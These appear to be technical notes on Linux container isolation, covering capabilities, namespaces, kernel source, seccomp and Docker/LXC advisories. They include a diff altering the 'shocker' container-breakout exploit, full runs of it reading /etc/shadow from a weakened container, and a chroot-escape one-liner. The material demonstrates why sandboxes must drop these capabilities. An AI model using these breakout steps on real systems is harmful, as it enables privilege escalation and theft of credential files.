Certificate validation in TLS and other protocols. Validating a public key certificate requires confirming that the current time is within the certificate’s validity period. Performing validation with a slow or inaccurate clock may cause expired certificates to be accepted as valid. A revoked certificate may also validate if the clock is slow, since the relying party will not check for updated revocation information.

Ticket verification in Kerberos. In Kerberos, authentication tickets have a validity period, and proper verification requires an accurate clock to prevent authentication with an expired ticket.

HTTP Strict Transport Security (HSTS) policy duration. HSTS allows website administrators to protect against downgrade attacks from HTTPS to HTTP by sending a header to browsers indicating that HTTPS must be used instead of HTTP. HSTS policies specify the duration of time that HTTPS must be used. If the browser’s clock jumps ahead, the policy may expire re-allowing downgrade attacks. A related mechanism, HTTP Public Key Pinning also relies on accurate client time for security.

For clients who set their clocks using NTP, these security mechanisms (and others) can be attacked by a network-level attacker who can intercept and modify NTP traffic, such as a malicious wireless access point or an insider at an ISP. In practice, most NTP servers do not authenticate themselves to clients, so a network attacker can intercept responses and set the timestamps arbitrarily. Even if the client sends requests to multiple servers, these may all be intercepted by an upstream network device and modified to present a consistently incorrect time to a victim. Such an attack on HSTS was demonstrated by Selvi, who provided a tool to advance the clock of victims in order to expire HSTS policies. Malhotra et al. present a variety of attacks that rely on NTP being unauthenticated, further emphasizing the need for authenticated time synchronization.

man 7 capabilities

       CAP_WAKE_ALARM (since Linux 3.0)
	      Trigger something that will wake up the system (set
	      CLOCK_REALTIME_ALARM and CLOCK_BOOTTIME_ALARM timers).

I had trouble finding more information about these, but “Waking systems from suspend” on LWN goes into more detail:

these timers are exposed to user space via the standard POSIX clocks and timers interface, using the new the CLOCK_REALTIME_ALARM clockid. The new clockid behaves identically to CLOCK_REALTIME except that timers set against the _ALARM clockid will wake the system if it is suspended.

Brad Spengler’s “False Boundaries and Arbitrary Code Execution”:

CAP_DAC_OVERRIDE: generic: same bypass as CAP_DAC_READ_SEARCH, can also modify a non-suid binary executed by root to execute code with full privileges (modifying a suid root binary for you to execute would require CAP_FSETID, as the setuid bit is cleared on modification otherwise; thanks to Eric Paris). The modprobe sysctl can be modified as mentioned above to execute code with full capabilities.

and of course Sebastian Krahmer’s email:

In 0.11 the problem is that the apps that run in the container have CAP_DAC_READ_SEARCH and CAP_DAC_OVERRIDE which allows the containered app to access files not just by pathname (which would be impossible due to the bind mount of the rootfs) but also by handles via open_by_handle_at().

He might mean that the combination of both of them is problematic, though, which is absolutely true: with and , it’s possible to modify arbitrary files: CAP_DAC_OVERRIDE``CAP_DAC_READ_SEARCH

shocker_write.patch
48a49,50
> char new_motd[] = "The tea from 2014 kicks your sekurity again\n";
> 
149d150
< 	char buf[0x1000];
161,163c162
< 	       "[***] forward to my friends who drink secury-tea too!      [***]\n\n<enter>\n");
< 
< 	read(0, buf, 1);
---
> 	       "[***] forward to my friends who drink secury-tea too!      [***]\n");
169c168
< 	if (find_handle(fd1, "/etc/shadow", &root_h, &h) <= 0)
---
> 	if (find_handle(fd1, "/etc/motd", &root_h, &h) <= 0)
175c174
< 	if ((fd2 = open_by_handle_at(fd1, (struct file_handle *)&h, O_RDONLY)) < 0)
---
> 	if ((fd2 = open_by_handle_at(fd1, (struct file_handle *)&h, O_WRONLY)) < 0)
178,180c177,179
< 	memset(buf, 0, sizeof(buf));
< 	if (read(fd2, buf, sizeof(buf) - 1) < 0)
< 		die("[-] read");
---
> 	if (write(fd2, new_motd, sizeof(new_motd)) != sizeof(new_motd))
> 		die("[-] write");
> 
182c181
< 	fprintf(stderr, "[!] Win! /etc/shadow output follows:\n%s\n", buf);
---
> 	fprintf(stderr, "[!] Win! /etc/motd written.\n");
allow_capdacreadsearch.diff
diff --git a/linux-containers-in-500-loc/contained.c b/linux-containers-in-500-loc/contained.c
index 501aff5..c0cabcc 100644
--- a/linux-containers-in-500-loc/contained.c
+++ b/linux-containers-in-500-loc/contained.c
@@ -33,7 +33,6 @@ int capabilities()
 		CAP_AUDIT_READ,
 		CAP_AUDIT_WRITE,
 		CAP_BLOCK_SUSPEND,
-		CAP_DAC_READ_SEARCH,
 		CAP_FSETID,
 		CAP_IPC_LOCK,
 		CAP_MAC_ADMIN,
[lizzie@empress l-c-i-500-l]$ sudo ./contained.allow_capdacreadsearch -m . -u 0 -c ./shocker_write
=> validating Linux version...4.8.4-1-ARCH on x86_64.
=> setting cgroups...memory...cpu...pids...blkio...done.
=> setting rlimit...done.
=> remounting everything with MS_PRIVATE...remounted.
=> making a temp directory and a bind mount there...done.
=> pivoting root...done.
=> unmounting /oldroot.axVxAE...done.
=> trying a user namespace...unsupported? continuing.
=> switching to uid 0 / gid 0...done.
=> dropping capabilities...bounding...inheritable...done.
=> filtering syscalls...done.
[***] docker VMM-container breakout Po(C) 2014             [***]
[***] The tea from the 90's kicks your sekurity again.     [***]
[***] If you have pending sec consulting, I'll happily     [***]
[***] forward to my friends who drink secury-tea too!      [***]
[*] Resolving 'etc/motd'
[*] Found .
[*] Found ..
[*] Found lib64
[*] Found sys
[*] Found run
[*] Found sbin
[*] Found opt
[*] Found tmp
[*] Found lost+found
[*] Found dev
[*] Found mnt
[*] Found root
[*] Found lib
[*] Found boot
[*] Found home
[*] Found usr
[*] Found bin
[*] Found srv
[*] Found etc
[+] Match: etc ino=4325377
[*] Brute forcing remaining 32bit. This can take a while...
[*] (etc) Trying: 0x00000000
[*] #=8, 1, char nh[] = {0x01, 0x00, 0x42, 0x00, 0x00, 0x00, 0x00, 0x00};
[*] Resolving 'motd'
[*] Found binfmt.d
[*] Found ts.conf
[*] Found nscd.conf
[*] Found dhcpcd.duid
[*] Found sensors3.conf
[*] Found libao.conf
[*] Found .
[*] Found motd
[+] Match: motd ino=4325389
[*] Brute forcing remaining 32bit. This can take a while...
[*] (motd) Trying: 0x00000000
[*] #=8, 1, char nh[] = {0x0d, 0x00, 0x42, 0x00, 0x00, 0x00, 0x00, 0x00};
[!] Got a final handle!
[*] #=8, 1, char nh[] = {0x0d, 0x00, 0x42, 0x00, 0x00, 0x00, 0x00, 0x00};
[!] Win! /etc/motd written.
=> cleaning cgroups...done.

allow_capdacreadsearch.diff
diff --git a/linux-containers-in-500-loc/contained.c b/linux-containers-in-500-loc/contained.c
index 501aff5..c0cabcc 100644
--- a/linux-containers-in-500-loc/contained.c
+++ b/linux-containers-in-500-loc/contained.c
@@ -33,7 +33,6 @@ int capabilities()
 		CAP_AUDIT_READ,
 		CAP_AUDIT_WRITE,
 		CAP_BLOCK_SUSPEND,
-		CAP_DAC_READ_SEARCH,
 		CAP_FSETID,
 		CAP_IPC_LOCK,
 		CAP_MAC_ADMIN,
allow_capdacreadsearch.diff
diff --git a/linux-containers-in-500-loc/contained.c b/linux-containers-in-500-loc/contained.c
index 501aff5..c0cabcc 100644
--- a/linux-containers-in-500-loc/contained.c
+++ b/linux-containers-in-500-loc/contained.c
@@ -33,7 +33,6 @@ int capabilities()
 		CAP_AUDIT_READ,
 		CAP_AUDIT_WRITE,
 		CAP_BLOCK_SUSPEND,
-		CAP_DAC_READ_SEARCH,
 		CAP_FSETID,
 		CAP_IPC_LOCK,
 		CAP_MAC_ADMIN,
[lizzie@empress l-c-i-500-l]$sudo ./contained -m . -u 0 -c ./shocker
=> validating Linux version...4.8.4-1-ARCH on x86_64.
=> setting cgroups...memory...cpu...pids...blkio...done.
=> setting rlimit...done.
=> remounting everything with MS_PRIVATE...remounted.
=> making a temp directory and a bind mount there...done.
=> pivoting root...done.
=> unmounting /oldroot.bWoGr4...done.
=> trying a user namespace...unsupported? continuing.
=> switching to uid 0 / gid 0...done.
=> dropping capabilities...bounding...inheritable...done.
=> filtering syscalls...done.
[***] docker VMM-container breakout Po(C) 2014             [***]
[***] The tea from the 90's kicks your sekurity again.     [***]
[***] If you have pending sec consulting, I'll happily     [***]
[***] forward to my friends who drink secury-tea too!      [***]

<enter>

[*] Resolving 'etc/shadow'
[-] open_by_handle_at: Operation not permitted
=> cleaning cgroups...done.
[lizzie@empress l-c-i-500-l]$ sudo ./contained.allow_capdacreadsearch -m . -u 0 -c ./shocker
=> validating Linux version...4.8.4-1-ARCH on x86_64.
=> setting cgroups...memory...cpu...pids...blkio...done.
=> setting rlimit...done.
=> remounting everything with MS_PRIVATE...remounted.
=> making a temp directory and a bind mount there...done.
=> pivoting root...done.
=> unmounting /oldroot.Jto0pj...done.
=> trying a user namespace...unsupported? continuing.
=> switching to uid 0 / gid 0...done.
=> dropping capabilities...bounding...inheritable...done.
=> filtering syscalls...done.
[***] docker VMM-container breakout Po(C) 2014             [***]
[***] The tea from the 90's kicks your sekurity again.     [***]
[***] If you have pending sec consulting, I'll happily     [***]
[***] forward to my friends who drink secury-tea too!      [***]

<enter>

[*] Resolving 'etc/shadow'
[*] Found .
[*] Found ..
[*] Found lib64
[*] Found sys
[*] Found run
[*] Found sbin
[*] Found opt
[*] Found tmp
[*] Found lost+found
[*] Found dev
[*] Found mnt
[*] Found root
[*] Found lib
[*] Found boot
[*] Found home
[*] Found usr
[*] Found bin
[*] Found srv
[*] Found etc
[+] Match: etc ino=4325377
[*] Brute forcing remaining 32bit. This can take a while...
[*] (etc) Trying: 0x00000000
[*] #=8, 1, char nh[] = {0x01, 0x00, 0x42, 0x00, 0x00, 0x00, 0x00, 0x00};
[*] Resolving 'shadow'
[*] Found binfmt.d
[*] Found ts.conf
[*] Found nscd.conf
[*] Found dhcpcd.duid
[*] Found sensors3.conf
[*] Found libao.conf
[*] Found .
[*] Found motd
[*] Found gdb
[*] Found ..
[*] Found qemu
[*] Found lirc
[*] Found healthd.conf
[*] Found subuid
[*] Found locale.gen.pacnew
[*] Found gtk-3.0
[*] Found idn.conf
[*] Found wgetrc
[*] Found mime.types
[*] Found texmf
[*] Found request-key.conf
[*] Found xinetd.d
[*] Found ssl
[*] Found ifplugd
[*] Found mpd.conf
[*] Found gimp
[*] Found logrotate.d
[*] Found dhcpcd.conf
[*] Found trusted-key.key
[*] Found resolv.conf
[*] Found gemrc
[*] Found libpaper.d
[*] Found hostname
[*] Found kernel
[*] Found audit
[*] Found request-key.d
[*] Found subgid
[*] Found services
[*] Found protocols
[*] Found profile.d
[*] Found Muttrc.dist
[*] Found audisp
[*] Found default
[*] Found resolv.conf.bak
[*] Found ufw
[*] Found man_db.conf
[*] Found gconf
[*] Found geoclue
[*] Found netconfig
[*] Found nanorc
[*] Found environment
[*] Found crypttab
[*] Found brltty.conf
[*] Found logrotate.conf
[*] Found goaccess.conf
[*] Found nsswitch.conf
[*] Found shadow
[+] Match: shadow ino=4334485
[*] Brute forcing remaining 32bit. This can take a while...
[*] (shadow) Trying: 0x00000000
[*] #=8, 1, char nh[] = {0x95, 0x23, 0x42, 0x00, 0x00, 0x00, 0x00, 0x00};
[!] Got a final handle!
[*] #=8, 1, char nh[] = {0x95, 0x23, 0x42, 0x00, 0x00, 0x00, 0x00, 0x00};
[!] Win! /etc/shadow output follows:
[redacted]
=> cleaning cgroups...done.

fs/namei.c:316@c8d2bc:

int generic_permission(struct inode *inode, int mask)
{
	int ret;

	/*
	 * Do the basic permission checks.
	 */
	ret = acl_permission_check(inode, mask);
	if (ret != -EACCES)
		return ret;

	if (S_ISDIR(inode->i_mode)) {
		/* DACs are overridable for directories */
		if (capable_wrt_inode_uidgid(inode, CAP_DAC_OVERRIDE))
			return 0;
		if (!(mask & MAY_WRITE))
			if (capable_wrt_inode_uidgid(inode,
						     CAP_DAC_READ_SEARCH))
				return 0;
		return -EACCES;
	}
	/*
	 * Read/write DACs are always overridable.
	 * Executable DACs are overridable when there is
	 * at least one exec bit set.
	 */
	if (!(mask & MAY_EXEC) || (inode->i_mode & S_IXUGO))
		if (capable_wrt_inode_uidgid(inode, CAP_DAC_OVERRIDE))
			return 0;

	/*
	 * Searching includes executable on directories, else just read.
	 */
	mask &= MAY_READ | MAY_WRITE | MAY_EXEC;
	if (mask == MAY_READ)
		if (capable_wrt_inode_uidgid(inode, CAP_DAC_READ_SEARCH))
			return 0;

	return -EACCES;
}

man 5 acct gives more useful information about this system than man 2 acct.

CAP_IPC_OWNER` is only used in : `ipcperms

ipc/util.c:468@c8d2bc

/**
 * ipcperms - check ipc permissions
 * @ns: ipc namespace
 * @ipcp: ipc permission set
 * @flag: desired permission set
 *
 * Check user, group, other permissions for access
 * to ipc resources. return 0 if allowed
 *
 * @flag will most probably be 0 or S_...UGO from <linux/stat.h>
 */
int ipcperms(struct ipc_namespace *ns, struct kern_ipc_perm *ipcp, short flag)
{
	kuid_t euid = current_euid();
	int requested_mode, granted_mode;

	audit_ipc_obj(ipcp);
	requested_mode = (flag >> 6) | (flag >> 3) | flag;
	granted_mode = ipcp->mode;
	if (uid_eq(euid, ipcp->cuid) ||
	    uid_eq(euid, ipcp->uid))
		granted_mode >>= 6;
	else if (in_group_p(ipcp->cgid) || in_group_p(ipcp->gid))
		granted_mode >>= 3;
	/* is there some bit set in requested_mode but not in granted_mode? */
	if ((requested_mode & ~granted_mode & 0007) &&
	    !ns_capable(ns->user_ns, CAP_IPC_OWNER))
		return -1;

	return security_ipc_permission(ipcp, flag);
}

It’s used in the following places immediately after looking up the IPC object in the IPC namespace:

In the IPC shared memory system ipc/shm.c@c8d2bc (done after and ):
```
shm_obtain_object
```
```
shm_obtain_object_check
```
- ipc/shm.c:869@c8d2bc: shmctl_nolock
- ipc/shm.c:1081@c8d2bc: do_shmat
In the IPC semaphore system, ipc/sem.c@c8d2bc (done and ):
```
sem_obtain_object
```
```
sem_obtain_object_check
```
- ipc/sem.c:1200@c8d2bc: semctl_nolock
- ipc/sem.c:1289@c8d2bc: semctl_setval
- ipc/sem.c:1360@c8d2bc: semctl_main
- ipc/sem.c:1816@c8d2bc: semtimedop
In the IPC message queue system, ipc/msg.c@c8d2bc (done after and :
```
msq_obtain_object
```
```
msq_obtain_object_check)
```
- ipc/msg.c:445@c8d2bc: msgctl_nolock
- ipc/msg.c:630@c8d2bc: do_msgsnd
- ipc/msg.c:846@c8d2bc: do_msgrcv

ipc_check_perms is another a thin layer over it that doesn’t check the IPC namespace.

ipc/util.c:290@c8d2bc

/**
 * ipc_check_perms - check security and permissions for an ipc object
 * @ns: ipc namespace
 * @ipcprgre: ipc permission set
 * @ops: the actual security routine to call
 * @params: its parameters
 *
 * This routine is called by sys_msgget(), sys_semget() and sys_shmget()
 * when the key is not IPC_PRIVATE and that key already exists in the
 * ds IDR.
 *
 * On success, the ipc id is returned.
 *
 * It is called with ipc_ids.rwsem and ipcp->lock held.
 */
static int ipc_check_perms(struct ipc_namespace *ns,
			   struct kern_ipc_perm *ipcp,
			   const struct ipc_ops *ops,
			   struct ipc_params *params)
{
	int err;

	if (ipcperms(ns, ipcp, params->flg))
		err = -EACCES;
	else {
		err = ops->associate(ipcp, params->flg);
		if (!err)
			err = ipcp->id;
	}

	return err;
}

which is called by . ipcget_public

ipc/util.c:323@c8d2bc

/**
 * ipcget_public - get an ipc object or create a new one
 * @ns: ipc namespace
 * @ids: ipc identifier set
 * @ops: the actual creation routine to call
 * @params: its parameters
 *
 * This routine is called by sys_msgget, sys_semget() and sys_shmget()
 * when the key is not IPC_PRIVATE.
 * It adds a new entry if the key is not found and does some permission
 * / security checkings if the key is found.
 *
 * On success, the ipc id is returned.
 */
static int ipcget_public(struct ipc_namespace *ns, struct ipc_ids *ids,
		const struct ipc_ops *ops, struct ipc_params *params)
{
	struct kern_ipc_perm *ipcp;
	int flg = params->flg;
	int err;

	/*
	 * Take the lock as a writer since we are potentially going to add
	 * a new entry + read locks are not "upgradable"
	 */
	down_write(&ids->rwsem);
	ipcp = ipc_findkey(ids, params->key);
	if (ipcp == NULL) {
		/* key not used */
		if (!(flg & IPC_CREAT))
			err = -ENOENT;
		else
			err = ops->getnew(ns, params);
	} else {
		/* ipc object has been locked by ipc_findkey() */

		if (flg & IPC_CREAT && flg & IPC_EXCL)
			err = -EEXIST;
		else {
			err = 0;
			if (ops->more_checks)
				err = ops->more_checks(ipcp, params);
			if (!err)
				/*
				 * ipc_check_perms returns the IPC id on
				 * success
				 */
				err = ipc_check_perms(ns, ipcp, ops, params);
		}
		ipc_unlock(ipcp);
	}
	up_write(&ids->rwsem);

	return err;
}
ipcget_public` handles both creation and accessing for non- requests. It **doesn't** check IPC namespace for existing IPC objects. It's called by if is not set: `IPC_PRIVATE``ipc_get``IPC_PRIVATE

ipc/util.c:625@c8d2bc

/**
 * ipcget - Common sys_*get() code
 * @ns: namespace
 * @ids: ipc identifier set
 * @ops: operations to be called on ipc object creation, permission checks
 *       and further checks
 * @params: the parameters needed by the previous operations.
 *
 * Common routine called by sys_msgget(), sys_semget() and sys_shmget().
 */
int ipcget(struct ipc_namespace *ns, struct ipc_ids *ids,
			const struct ipc_ops *ops, struct ipc_params *params)
{
	if (params->key == IPC_PRIVATE)
		return ipcget_new(ns, ids, ops, params);
	else
		return ipcget_public(ns, ids, ops, params);
}

whcih in turn is called in the following places:

But , , and are all part of the System V IPC set, and in order to use them you need to call , / , and / , all only work for objects in the namespace: shmget``semget``msgget``shmat``semop``semtimedop``msgsend``msgrcv~

shmat` immediately calls , which is listed above; `do_shmat

ipc/shm.c:1249@c8d2bc

SYSCALL_DEFINE3(shmat, int, shmid, char __user *, shmaddr, int, shmflg)
{
	unsigned long ret;
	long err;

	err = do_shmat(shmid, shmaddr, shmflg, &ret, SHMLBA);
	if (err)
		return err;
	force_successful_syscall_return();
	return (long)ret;
}
semop` calls : `semtimedop

ipc/sem.c:20151@c8d2bc

SYSCALL_DEFINE3(semop, int, semid, struct sembuf __user *, tsops,
		unsigned, nsops)
{
	return sys_semtimedop(semid, tsops, nsops, NULL);
}

ipc/sem.c:1816@c8d2bc

SYSCALL_DEFINE4(semtimedop, int, semid, struct sembuf __user *, tsops,
		unsigned, nsops, const struct timespec __user *, timeout)
{
	/* ... */
	ns = current->nsproxy->ipc_ns;

	/* ...
	   allocate some space for things.
	   ...
	*/

	sma = sem_obtain_object_check(ns, semid);

	/* ... */
}
msgsnd` and immediately call and , which are also listed above: `msgrcv``do_msgsnd``do_msgrcv

ipc/msg.c:743@c8d2bc

SYSCALL_DEFINE4(msgsnd, int, msqid, struct msgbuf __user *, msgp, size_t, msgsz,
		int, msgflg)
{
	long mtype;

	if (get_user(mtype, &msgp->mtype))
		return -EFAULT;
	return do_msgsnd(msqid, mtype, msgp->mtext, msgsz, msgflg);
}

ipc/msg.c:1004@c8d2bc

SYSCALL_DEFINE5(msgrcv, int, msqid, struct msgbuf __user *, msgp, size_t, msgsz,
		long, msgtyp, int, msgflg)
{
	return do_msgrcv(msqid, msgp, msgsz, msgtyp, msgflg, do_msg_fill);
}

We can see that they’re effectively namespaced:

enumerate_net_devs.c
/* Local Variables: */
/* compile-command: "gcc -Wall -Werror -static enumerate_net_devs.c \*/
/*                   -o enumerate_net_devs" */
/* End: */
#include <stdio.h>
#include <net/if.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/ioctl.h>

int main (int argc, char **argv)
{
	int sock = socket(PF_LOCAL, SOCK_SEQPACKET, 0);
	for (size_t i = 0; i < 100; i++) {
		struct ifreq req = { .ifr_ifindex = i };
		if (!ioctl(sock, SIOCGIFNAME, &req))
			printf("%3lu: %s\n", i, req.ifr_name);
	}
	return 0;
}
[lizzie@empress l-c-i-500-l]$sudo ./contained -m . -u 0 -c ./enumerate_net_devs
=> validating Linux version...4.7.10.201610222037-1-grsec on x86_64.
=> setting cgroups...memory...cpu...pids...blkio...done.
=> setting rlimit...done.
=> remounting everything with MS_PRIVATE...remounted.
=> making a temp directory and a bind mount there...done.
=> pivoting root...done.
=> unmounting /oldroot.7npCN7...done.
=> trying a user namespace...writing /proc/1750/uid_map...writing
/proc/1750/gid_map...done.
=> switching to uid 0 / gid 0...done.
=> dropping capabilities...bounding...inheritable...done.
=> filtering syscalls...done.  1: lo
=> cleaning cgroups...done.

Network device datastructures are created inside of the kernel, not in userspace with . mknod

For example, does this: ip link add dummy0 type dummy

Opens a netlink socket.NETLINK_ROUTE
Sends a message over it.RTM_NEWLINK

Code in net/core/rtnetlink.c@c8d2bc dispatches the message to , which does this; rtnl_create_link

net/core/rtnetlink.c:2239@c8d2bc

struct net_device *rtnl_create_link(struct net *net,
	const char *ifname, unsigned char name_assign_type,
	const struct rtnl_link_ops *ops, struct nlattr *tb[])
{
	int err;
	struct net_device *dev;
	unsigned int num_tx_queues = 1;
	unsigned int num_rx_queues = 1;

	/* ... */

	err = -ENOMEM;
	dev = alloc_netdev_mqs(ops->priv_size, ifname, name_assign_type,
			       ops->setup, num_tx_queues, num_rx_queues);
	if (!dev)
		goto err;

	/* ... */
}

alloc_netdev_mqs calls the function: setup

/**
 *	alloc_netdev_mqs - allocate network device
 *	@sizeof_priv:		size of private data to allocate space for
 *	@name:			device name format string
 *	@name_assign_type:	origin of device name
 *	@setup:			callback to initialize device
 *	@txqs:			the number of TX subqueues to allocate
 *	@rxqs:			the number of RX subqueues to allocate
 *
 *	Allocates a struct net_device with private data area for driver use
 *	and performs basic initialization.  Also allocates subqueue structs
 *	for each queue on the device.
 */
struct net_device *alloc_netdev_mqs(int sizeof_priv, const char *name,
		unsigned char name_assign_type,
		void (*setup)(struct net_device *),
		unsigned int txqs, unsigned int rxqs)
{
	struct net_device *dev;
	size_t alloc_size;
	struct net_device *p;

	/* ... */

	setup(dev);

	/* ... */
}

dummy_setup gets called, since it’s the of a : .setup``rtnl_link_ops

drivers/net/dummy.c:170@c8d2bc

static struct rtnl_link_ops dummy_link_ops __read_mostly = {
	.kind		= DRV_NAME,
	.setup		= dummy_setup,
	.validate	= dummy_validate,
};

drivers/net/dummy.c:137@c8d2bc

static void dummy_setup(struct net_device *dev)
{
	ether_setup(dev);

	/* Initialize the device structure. */
	dev->netdev_ops = &dummy_netdev_ops;
	dev->ethtool_ops = &dummy_ethtool_ops;
	dev->destructor = free_netdev;

	/* Fill in device structure with ethernet-generic values. */
	dev->flags |= IFF_NOARP;
	dev->flags &= ~IFF_MULTICAST;
	dev->priv_flags |= IFF_LIVE_ADDR_CHANGE | IFF_NO_QUEUE;
	dev->features	|= NETIF_F_SG | NETIF_F_FRAGLIST;
	dev->features	|= NETIF_F_ALL_TSO | NETIF_F_UFO;
	dev->features	|= NETIF_F_HW_CSUM | NETIF_F_HIGHDMA | NETIF_F_LLTX;
	dev->features	|= NETIF_F_GSO_ENCAP_ALL;
	dev->hw_features |= dev->features;
	dev->hw_enc_features |= dev->features;
	eth_hw_addr_random(dev);
}

In other words, there’s no equivalent of userspace major / minor device numbers for network devices.

kernel/ptrace.c:1079@c8d2bc:

SYSCALL_DEFINE4(ptrace, long, request, long, pid, unsigned long, addr,
		unsigned long, data)
{
	struct task_struct *child;
	long ret;

	if (request == PTRACE_TRACEME) {
		ret = ptrace_traceme();
		if (!ret)
			arch_ptrace_attach(current);
		goto out;
	}

	child = ptrace_get_task_struct(pid);
	if (IS_ERR(child)) {
		ret = PTR_ERR(child);
		goto out;
	}
	[...]
}

which calls : ptrace_get_task_struct

kernel/ptrace.c:1060@c8d2bc:

static struct task_struct *ptrace_get_task_struct(pid_t pid)
{
	struct task_struct *child;

	rcu_read_lock();
	child = find_task_by_vpid(pid);
	if (child)
		get_task_struct(child);
	rcu_read_unlock();

	if (!child)
		return ERR_PTR(-ESRCH);
	return child;
}

…which in turn calls find_task_by_vpid

kernel/pid.c:459@c8d2bc:

struct task_struct *find_task_by_vpid(pid_t vnr)
{
	return find_task_by_pid_ns(vnr, task_active_pid_ns(current));
}

which calls : find_task_by_pid_ns

kernel/pid.c:452@c8d2bc:

struct task_struct *find_task_by_pid_ns(pid_t nr, struct pid_namespace *ns)
{
	RCU_LOCKDEP_WARN(!rcu_read_lock_held(),
			 "find_task_by_pid_ns() needs rcu_read_lock() protection");
	return pid_task(find_pid_ns(nr, ns), PIDTYPE_PID);
}

which, finally, calls . You can see here that it only finds a that shares the pid namespace of the current task. find_pid_ns``stuct pid *

kernel/pid.c:366@c8d2bc:

struct pid *find_pid_ns(int nr, struct pid_namespace *ns)
{
	struct upid *pnr;

	hlist_for_each_entry_rcu(pnr,
			&pid_hash[pid_hashfn(nr, ns)], pid_chain)
		if (pnr->nr == nr && pnr->ns == ns)
			return container_of(pnr, struct pid,
					numbers[ns->level]);

	return NULL;
}

The syscalls call , which follows a dense call chain ( -> -> -> -> -> ) to eventually end up in , which does respect user namespaces: kill``kill_something_info``kill_pid_info``group_send_sig_info``do_send_sig_info``send_sig_info``send_signal``__send_signal``__send_signal

kernel/signal.c:972@c8d2bc

static int __send_signal(int sig, struct siginfo *info, struct task_struct *t,
			int group, int from_ancestor_ns)
{
	/* ... */
	q = __sigqueue_alloc(sig, t, GFP_ATOMIC | __GFP_NOTRACK_FALSE_POSITIVE,
		override_rlimit);
	if (q) {
		list_add_tail(&q->list, &pending->list);
		switch ((unsigned long) info) {
		case (unsigned long) SEND_SIG_NOINFO:
			q->info.si_signo = sig;
			q->info.si_errno = 0;
			q->info.si_code = SI_USER;
			q->info.si_pid = task_tgid_nr_ns(current,
							task_active_pid_ns(t));
			q->info.si_uid = from_kuid_munged(current_user_ns(), current_uid());
			break;
		case (unsigned long) SEND_SIG_PRIV:
			q->info.si_signo = sig;
			q->info.si_errno = 0;
			q->info.si_code = SI_KERNEL;
			q->info.si_pid = 0;
			q->info.si_uid = 0;
			break;
		default:
			copy_siginfo(&q->info, info);
			if (from_ancestor_ns)
				q->info.si_pid = 0;
			break;
		}

		userns_fixup_signal_uid(&q->info, t);
	}
	/*...*/
}

Quoted man 7 capabilities, again:

	CAP_SETGID
		Make  arbitrary  manipulations   of  process  GIDs  and
		supplementary GID  list; forge GID when  passing socket
		credentials via  UNIX domain sockets; write  a group ID
		mapping in a user namespace (see user_namespaces(7)).
	CAP_SETUID
		Make   arbitrary   manipulations    of   process   UIDs
		(setuid(2),  setreuid(2),  setresuid(2),  setfsuid(2));
		forge  UID when  passing  socket  credentials via  UNIX
		domain  sockets; write  a  user ID  mapping  in a  user
		namespace (see user_namespaces(7)).

Brad Spengler’s “False Boundaries and Arbitrary Code Execution”, again

CAP_SYS_CHROOT: generic: From Julien Tinnes/Chris Evans: if you have write access to the same filesystem as a suid root binary, set up a chroot environment with a backdoored libc and then execute a hardlinked suid root binary within your chroot and gain full root privileges through your backdoor

man 2 chroot:

This call does not change the current working directory, so that after the call ‘.’ can be outside the tree rooted at ‘/’. In particular, the superuser can escape from a “chroot jail” by doing:
mkdir foo; chroot foo; cd ..

There have been issues with unpacking containers in Docker and LXC:

Docker 1.3.2 - Security Advisory {24 Nov 2014}

=====================================================
[CVE-2014-6407] Archive extraction allowing host privilege escalation
=====================================================
Severity: Critical
Affects: Docker up to 1.3.1

The Docker engine, up to and including version 1.3.1, was vulnerable to
extracting files to arbitrary paths on the host during ‘docker pull’ and
‘docker load’ operations. This was caused by symlink and hardlink
traversals present in Docker's image extraction. This vulnerability could
be leveraged to perform remote code execution and privilege escalation.

Docker 1.6.1 - Security Advisory {150507}

====================================================================

[CVE-2015-3629] Symlink traversal on container respawn allows local
privilege escalation

====================================================================

Libcontainer version 1.6.0 introduced changes which facilitated a mount
namespace breakout upon respawn of a container. This allowed malicious
images to write files to the host system and escape containerization.

Security issues in LXC (CVE-2015-1331 and CVE-2015-1334), from Tyler Hicks

* Roman Fiedler discovered a directory traversal flaw that allows
  arbitrary file creation as the root user. A local attacker must set up
  a symlink at /run/lock/lxc/var/lib/lxc/<CONTAINER>, prior to an admin
  ever creating an LXC container on the system. If an admin then creates
  a container with a name matching <CONTAINER>, the symlink will be
  followed and LXC will create an empty file at the symlink's target as
  the root user.
  - CVE-2015-1331
  - Affects LXC 1.0.0 and higher
  - https://launchpad.net/bugs/1470842
  - https://github.com/lxc/lxc/commit/72cf81f6a3404e35028567db2c99a90406e9c6e6 (master)
  - https://github.com/lxc/lxc/commit/61ecf69d7834921cc078e14d1b36c459ad8f91c7 (stable-1.1)
  - https://github.com/lxc/lxc/commit/f547349ea7ef3a6eae6965a95cb5986cd921bd99 (stable-1.0)

* Roman Fiedler discovered a flaw that allows processes intended to be
  run inside of confined LXC containers to escape their AppArmor or
  SELinux confinement. A malicious container can create a fake proc
  filesystem, possibly by mounting tmpfs on top of the container's
  /proc, and wait for a lxc-attach to be ran from the host environment.
  lxc-attach incorrectly trusts the container's
  /proc/PID/attr/{current,exec} files to set up the AppArmor profile and
  SELinux domain transitions which may result in no confinement being
  used.
  - CVE-2015-1334
  - Affects LXC 0.9.0 and higher
  - https://launchpad.net/bugs/1475050
  - https://github.com/lxc/lxc/commit/5c3fcae78b63ac9dd56e36075903921bd9461f9e (master)
  - https://github.com/lxc/lxc/commit/659e807c8dd1525a5c94bdecc47599079fad8407 (stable-1.1)
  - https://github.com/lxc/lxc/commit/15ec0fd9d490dd5c8a153401360233c6ee947c24 (stable-1.0)

Tyler

These are all really interesting! I want to write more about them.

The Docker seccomp policy doesn’t include an explicit blacklist, which makes it a little hard to follow, so I wrote code to find it.

    #!/usr/bin/env python3

    import gzip
    import requests
    import re
    import sys

    url = "https://raw.githubusercontent.com/docker/docker/5ff21add06ce0e502b41a194077daad311901996/profiles/seccomp/default.json"

    conditional = set()
    allowed = set()
    disallowed = set()

    for entry in requests.get(url).json()["syscalls"]:
        if entry["args"]:
           conditional |= set(entry["names"])
        else:
            allowed |= set(entry["names"])

    manpage = "/usr/share/man/man2/syscalls.2.gz"

    with gzip.open(manpage, "r") as f:
        ready = False
        for _line in f:
            line = _line.decode("utf-8")
            # table end
            if ready and line == ".TE\n":
                break
            match = re.match(r"\\fB(.+?)\\fP(.+)", line)
            if match:
                if match.group(1) == "System call":
                    ready = True
                elif (match.group(1) not in allowed
                      and match.group(1) not in conditional):
                    disallowed.add(match.group(1))

    print("Conditionally allowed:")
    for c in sorted(conditional):
        sys.stdout.write("~%s~, " % c)
    print("\n\nDisallowed:")
